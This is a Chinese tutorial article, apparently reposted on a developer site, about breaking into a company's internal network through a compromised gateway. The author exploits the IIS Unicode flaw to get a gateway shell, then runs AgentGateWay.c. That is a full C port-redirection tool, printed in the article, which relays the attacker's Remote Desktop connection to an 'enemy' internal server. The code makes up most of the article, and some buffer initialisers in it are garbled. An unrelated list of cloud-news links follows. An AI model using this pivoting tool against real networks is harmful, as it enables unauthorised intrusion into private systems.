编程突破TCP/IP过滤防火墙进入内网

简介: 编程突破TCP/IP过滤防火墙进入内网

天极网

 现在很多企业或者公司基本上网方式基本上都是申请一条连接到Internet的线路, 宽带、DDN、 ADSL、ISDN等等,然后用一台 服务器做网关,服务器两块网卡,一块是连接到Internet,另一块是连接到内网的HUB或者 交换机,然后内网的其他机器就可以通过网关连接到Internet。

 也许有些人会这样想,我在内网之中,我们之间没有直接的连接,你没有办法攻击我。事实并非如此,在内网的机器同样可能遭受到来自Internet的攻击,当然前提是攻击者已经取得网关服务器的某些权限,呵呵,这是不是废话?其实,Internet上很多做网关的服务器并未经过严格的 安全配置,要获取权限也不是想象中的那么难。

 Ok!废话就不说了,切入正题。我们的目标是用我们的TermClient[M$终端服务客户端]连接到敌人内网的TermServer机器。M$的终端服务是一个很好的远程管理工具,不是吗?呵呵。没有做特别说明的话,文中提到的服务器OS都为windows 2000。服务器为 Linux或其他的话,原理也差不多,把 程序稍微修改就行了。

 假设敌人 网络拓扑如下图所示,没有安装 防火墙或在网关服务器上做TCP/IP限制。

 我们的目标是连接上敌人内网的Terminal Server[192.168.1.3],因为没有办法直接和他建立连接,那么只有先从它的网关服务器上下手了。假如敌人网关服务器是M$的windows 2k,IIS有Unicode 漏洞[现在要找些有漏洞的机器太容易了,但我只是scripts kid,只会利用现成的漏洞做些简单的攻击:(555),那么我们就得到一个网关的shell了,我们可以在那上面运行我们的程序,虽然权限很低,但也可以做很多事情了。Ok!让我们来写一个做TCP socket数据转发的小程序,让敌人的网关服务器忠实的为我[202.1.1.1]和敌人内网的TermServer[192.168.1.3]之间转发数据。题外话:实际入侵过程是先取得网关服务器的权限,然后用他做跳板,进一步摸清它的内部网络拓扑结构,再做进一步的入侵,现在敌人的网络拓扑是我们给他设计的。

 攻击流程如下:

 <1>在网关服务器202.2.2.2运行我们的程序AgentGateWay,他监听TCP 3389端口[改成别的,那我们就要相应的修改TermClient了]等待我们去连接。

 <2>我们202.1.1.1用TermClient连接到202.2.2.2:3389。

 <3>202.2.2.2.接受202.1.1.1的连接,然后再建立一个TCP socket连接到自己内网的TermServer[192.168.1.3]

 <4>这样我们和敌人内网的TermServer之间的数据通道就建好了,接下来网关就忠实的为我们转发数据啦。当我们连接到202.2.2.2:3389的时候,其实出来的界面是敌人内网的192.168.1.3,感觉怎么样?

 程序代码如下:

/********************************************************************** 
Module Name:AgentGateWay.c 
Date:2001/4/15 
CopyRight(c) eyas 
说明:端口重定向工具,在网关上运行,把端口重定向到内网的IP、PORT, 
就可以进入内网了 
sock[0]==>sClient sock[1]==>sTarget 
**********************************************************************/ 
#include 
#include 
#include "TCPDataRedird.c" 
#define TargetIP TEXT("192.168.1.3") 
#define TargetPort (int)3389 
#define ListenPort (int)3389//监听端口 
#pragma comment(lib,"ws2_32.lib") 
int main() 
{ 
 WSADATA wsd; 
 SOCKET sListen=INVALID_SOCKET,//本机监听的socket 
 sock[2]; 
 struct sockaddr_in Local,Client,Target; 
 int iAddrSize; 
 HANDLE hThreadC2T=NULL,//C2T=ClientToTarget 
 hThreadT2C=NULL;//T2C=TargetToClient 
 DWORD dwThreadID; 
 __try 
 { 
  if(WSAStartup(MAKEWORD(2,2),&wsd)!=0) 
  { 
   printf("/nWSAStartup() failed:%d",GetLastError()); 
   __leave; 
  } 
  sListen=socket(AF_INET,SOCK_STREAM,IPPROTO_IP); 
  if(sListen==INVALID_SOCKET) 
  { 
   printf("/nsocket() failed:%d",GetLastError()); 
   __leave; 
  } 
  Local.sin_addr.s_addr=htonl(INADDR_ANY); 
  Local.sin_family=AF_INET; 
  Local.sin_port=htons(ListenPort); 
  Target.sin_family=AF_INET; 
  Target.sin_addr.s_addr=inet_addr(TargetIP); 
  Target.sin_port=htons(TargetPort); 

  if(bind(sListen,(struct sockaddr *)&Local,sizeof(Local))==SOCKET_ERROR) 
  { 
   printf("/nbind() failed:%d",GetLastError()); 
   __leave; 
  } 
  if(listen(sListen,1)==SOCKET_ERROR) 
  { 
   printf("/nlisten() failed:%d",GetLastError()); 
   __leave; 
  } 
  //scoket循环 
  while(1) 
  { 
   printf("/n/n*************Waiting Client Connect to**************/n/n"); 
   iAddrSize=sizeof(Client); 
   //get socket sClient 
   sock[0]=accept(sListen,(struct sockaddr *)&Client,&iAddrSize); 
   if(sock[0]==INVALID_SOCKET) 
   { 
    printf("/naccept() failed:%d",GetLastError()); 
    break; 
   } 
   printf("/nAccept client==>%s:%d",inet_ntoa(Client.sin_addr), ntohs(Client.sin_port)); 
   //create socket sTarget 
   sock[1]=socket(AF_INET,SOCK_STREAM,IPPROTO_IP); 
   if(sock[1]==INVALID_SOCKET) 
   { 
    printf("/nsocket() failed:%d",GetLastError()); 
    __leave; 
   } 
   //connect to target port 
   if(connect(sock[1],(struct sockaddr *)&Target,sizeof(Target))==SOCKET_ERROR) 
   { 
    printf("/nconnect() failed:%d",GetLastError()); 
    __leave; 
   } 
   printf("/nconnect to target 3389 success!"); 
   //创建两个线程进行数据转发 
   hThreadC2T=CreateThread(NULL,0,TCPDataC2T,(LPVOID)sock,0,&dwThreadID); 
   hThreadT2C=CreateThread(NULL,0,TCPDataT2C,(LPVOID)sock,0,&dwThreadID); 
   //等待两个线程结束 
   WaitForSingleObject(hThreadC2T,INFINITE); 
   WaitForSingleObject(hThreadT2C,INFINITE); 
   CloseHandle(hThreadC2T); 
   CloseHandle(hThreadT2C); 
   closesocket(sock[1]); 
   closesocket(sock[0]); 
   printf("/n/n*****************Connection Close*******************/n/n"); 
  }//end of sock外循环 
 }//end of try 
 __finally 
 { 
  if(sListen!=INVALID_SOCKET) closesocket(sListen); 
  if(sock[0]!=INVALID_SOCKET) closesocket(sock[0]); 
  if(sock[1]!=INVALID_SOCKET) closesocket(sock[1]); 
  if(hThreadC2T!=NULL) CloseHandle(hThreadC2T); 
  if(hThreadT2C!=NULL) CloseHandle(hThreadT2C); 
  WSACleanup(); 
 } 
 return 0; 
} 
/************************************************************************* 
Module:TCPDataRedird.c 
Date:2001/4/16 
CopyRight(c) eyas 
HomePage:www.patching.net 
Thanks to shotgun 
说明:TCP socket数据转发,sock[0]==>sClient sock[1]==>sTarget 
*************************************************************************/ 
#define BuffSize 20*1024 //缓冲区大小20k 
//此函数负责从Client读取数据,然后转发给Target 
DWORD WINAPI TCPDataC2T(SOCKET* sock) 
{ 
 int iRet, 
 ret=-1,//select 返回值 
 iLeft, 
 idx, 
 iSTTBCS=0;//STTBCS=SendToTargetBuffCurrentSize 
 char szSendToTargetBuff[BuffSize]=, 
 szRecvFromClientBuff[BuffSize]=;
 fd_set fdread,fdwrite; 
 printf("/n/n*****************Connection Active*******************/n/n"); 
 while(1) 
 { 
  FD_ZERO(&fdread); 
  FD_ZERO(&fdwrite); 
  FD_SET(sock[0],&fdread); 
  FD_SET(sock[1],&fdwrite); 
  if((ret=select(0,&fdread,&fdwrite,NULL,NULL))==SOCKET_ERROR) 
  { 
   printf("/nselect() failed:%d",GetLastError()); 
   break; 
  } 
  //printf("/nselect() return value ret=%d",ret); 
  if(ret>0) 
  { 
   //sClinet可读,client有数据要发送过来 
   if(FD_ISSET(sock[0],&fdread)) 
   { 
    //接收sock[0]发送来的数据 
    iRet=recv(sock[0],szRecvFromClientBuff,BuffSize,0); 
    if(iRet==SOCKET_ERROR) 
    { 
     printf("/nrecv() from sock[0] failed:%d",GetLastError()); 
     break; 
    } 
    else if(iRet==0) 
     break; 
    printf("/nrecv %d bytes from sClinet.",iRet); 
    //把从client接收到的数据存添加到发往target的缓冲区 
    memcpy(szSendToTargetBuff+iSTTBCS,szRecvFromClientBuff,iRet); 
    //刷新发往target的数据缓冲区当前buff大小 
    iSTTBCS+=iRet; 
    //清空接收client数据的缓冲区 
    memset(szRecvFromClientBuff,0,BuffSize); 
   } 
   //sTarget可写,把从client接收到的数据发送到target 
   if(FD_ISSET(sock[1],&fdwrite)) 
   { 
    //转发数据到target的3389端口 
    iLeft=iSTTBCS; 
    idx=0; 
    while(iLeft>0) 
    { 
     iRet=send(sock[1],&szSendToTargetBuff[idx],iLeft,0); 
     if(iRet==SOCKET_ERROR) 
     { 
      printf("/nsend() to target failed:%d",GetLastError()); 
      break; 
     } 
     printf("/nsend %d bytes to target",iRet); 
     iLeft-=iRet; 
     idx+=iRet; 
    } 
    //清空缓冲区 
    memset(szSendToTargetBuff,0,BuffSize); 
    //重置发往target的数据缓冲区当前buff大小 
    iSTTBCS=0; 
   } 
  }//end of select ret 
  Sleep(1); 
 }//end of data send & recv循环 
 return 0; 
} 
//此函数负责从target读取数据,然后发送给client 
DWORD WINAPI TCPDataT2C(SOCKET* sock) 
{ 
 int iRet, 
 ret=-1,//select 返回值 
 iLeft, 
 idx, 
 iSTCBCS=0;//STCBCS=SendToClientBuffCurrentSize 
 char szRecvFromTargetBuff[BuffSize]=, 
 szSendToClientBuff[BuffSize]=; 
 fd_set fdread,fdwrite; 

 while(1) 
 { 
  FD_ZERO(&fdread); 
  FD_ZERO(&fdwrite); 
  FD_SET(sock[0],&fdwrite); 
  FD_SET(sock[1],&fdread); 
  if((ret=select(0,&fdread,&fdwrite,NULL,NULL))==SOCKET_ERROR) 
  { 
   printf("/nselect() failed:%d",GetLastError()); 
   break; 
  } 
  if(ret>0) 
  { 
   //sTarget可读,从target接收数据 
   if(FD_ISSET(sock[1],&fdread)) 
   { 
    //接收target返回数据 
    iRet=recv(sock[1],szRecvFromTargetBuff,BuffSize,0); 
    if(iRet==SOCKET_ERROR) 
    { 
     printf("/nrecv() from target failed:%d",GetLastError()); 
     break; 
    } 
    else if(iRet==0) 
     break; 
    printf("/nrecv %d bytes from target",iRet); 
    //把从target接收到的数据添加到发送到client的缓冲区 
    memcpy(szSendToClientBuff+iSTCBCS,szRecvFromTargetBuff,iRet); 
    //清空接收target返回数据缓冲区 
    memset(szRecvFromTargetBuff,0,BuffSize); 
    //刷新发送到client的数据缓冲区当前大小 
    iSTCBCS+=iRet; 
   } 
   //client可写,发送target返回数据到client 
   if(FD_ISSET(sock[0],&fdwrite)) 
   { 
    //发送target返回数据到client 
    iLeft=iSTCBCS; 
    idx=0; 
    while(iLeft>0) 
    { 
     iRet=send(sock[0],&szSendToClientBuff[idx],iLeft,0); 
     if(iRet==SOCKET_ERROR) 
     { 
      printf("/nsend() to Client failed:%d",GetLastError()); 
      break; 
     } 
     printf("/nsend %d bytes to Client",iRet); 
     iLeft-=iRet; 
     idx+=iRet; 
    } 
    //清空缓冲区 
    memset(szSendToClientBuff,0,BuffSize); 
    iSTCBCS=0; 
   } 
  }//end of select ret 
  Sleep(1); 
 }//end of while 
 return 0; 
}
相关文章
|
10天前
|
弹性计算 人工智能 架构师
阿里云携手Altair共拓云上工业仿真新机遇
2024年9月12日,「2024 Altair 技术大会杭州站」成功召开,阿里云弹性计算产品运营与生态负责人何川,与Altair中国技术总监赵阳在会上联合发布了最新的“云上CAE一体机”。
阿里云携手Altair共拓云上工业仿真新机遇
|
7天前
|
机器学习/深度学习 算法 大数据
【BetterBench博士】2024 “华为杯”第二十一届中国研究生数学建模竞赛 选题分析
2024“华为杯”数学建模竞赛,对ABCDEF每个题进行详细的分析,涵盖风电场功率优化、WLAN网络吞吐量、磁性元件损耗建模、地理环境问题、高速公路应急车道启用和X射线脉冲星建模等多领域问题,解析了问题类型、专业和技能的需要。
2512 16
【BetterBench博士】2024 “华为杯”第二十一届中国研究生数学建模竞赛 选题分析
|
6天前
|
机器学习/深度学习 算法 数据可视化
【BetterBench博士】2024年中国研究生数学建模竞赛 C题:数据驱动下磁性元件的磁芯损耗建模 问题分析、数学模型、python 代码
2024年中国研究生数学建模竞赛C题聚焦磁性元件磁芯损耗建模。题目背景介绍了电能变换技术的发展与应用,强调磁性元件在功率变换器中的重要性。磁芯损耗受多种因素影响,现有模型难以精确预测。题目要求通过数据分析建立高精度磁芯损耗模型。具体任务包括励磁波形分类、修正斯坦麦茨方程、分析影响因素、构建预测模型及优化设计条件。涉及数据预处理、特征提取、机器学习及优化算法等技术。适合电气、材料、计算机等多个专业学生参与。
1520 14
【BetterBench博士】2024年中国研究生数学建模竞赛 C题:数据驱动下磁性元件的磁芯损耗建模 问题分析、数学模型、python 代码
|
2天前
|
存储 关系型数据库 分布式数据库
GraphRAG:基于PolarDB+通义千问+LangChain的知识图谱+大模型最佳实践
本文介绍了如何使用PolarDB、通义千问和LangChain搭建GraphRAG系统,结合知识图谱和向量检索提升问答质量。通过实例展示了单独使用向量检索和图检索的局限性,并通过图+向量联合搜索增强了问答准确性。PolarDB支持AGE图引擎和pgvector插件,实现图数据和向量数据的统一存储与检索,提升了RAG系统的性能和效果。
|
8天前
|
编解码 JSON 自然语言处理
通义千问重磅开源Qwen2.5,性能超越Llama
击败Meta,阿里Qwen2.5再登全球开源大模型王座
539 14
|
1月前
|
运维 Cloud Native Devops
一线实战:运维人少,我们从 0 到 1 实践 DevOps 和云原生
上海经证科技有限公司为有效推进软件项目管理和开发工作,选择了阿里云云效作为 DevOps 解决方案。通过云效,实现了从 0 开始,到现在近百个微服务、数百条流水线与应用交付的全面覆盖,有效支撑了敏捷开发流程。
19282 30
|
8天前
|
人工智能 自动驾驶 机器人
吴泳铭:AI最大的想象力不在手机屏幕,而是改变物理世界
过去22个月,AI发展速度超过任何历史时期,但我们依然还处于AGI变革的早期。生成式AI最大的想象力,绝不是在手机屏幕上做一两个新的超级app,而是接管数字世界,改变物理世界。
461 48
吴泳铭:AI最大的想象力不在手机屏幕,而是改变物理世界
|
1月前
|
人工智能 自然语言处理 搜索推荐
阿里云Elasticsearch AI搜索实践
本文介绍了阿里云 Elasticsearch 在AI 搜索方面的技术实践与探索。
18837 20
|
1月前
|
Rust Apache 对象存储
Apache Paimon V0.9最新进展
Apache Paimon V0.9 版本即将发布,此版本带来了多项新特性并解决了关键挑战。Paimon自2022年从Flink社区诞生以来迅速成长,已成为Apache顶级项目,并广泛应用于阿里集团内外的多家企业。
17526 13
Apache Paimon V0.9最新进展
|
1天前
|
云安全 存储 运维
叮咚!您有一份六大必做安全操作清单,请查收
云安全态势管理(CSPM)开启免费试用
358 4
叮咚!您有一份六大必做安全操作清单,请查收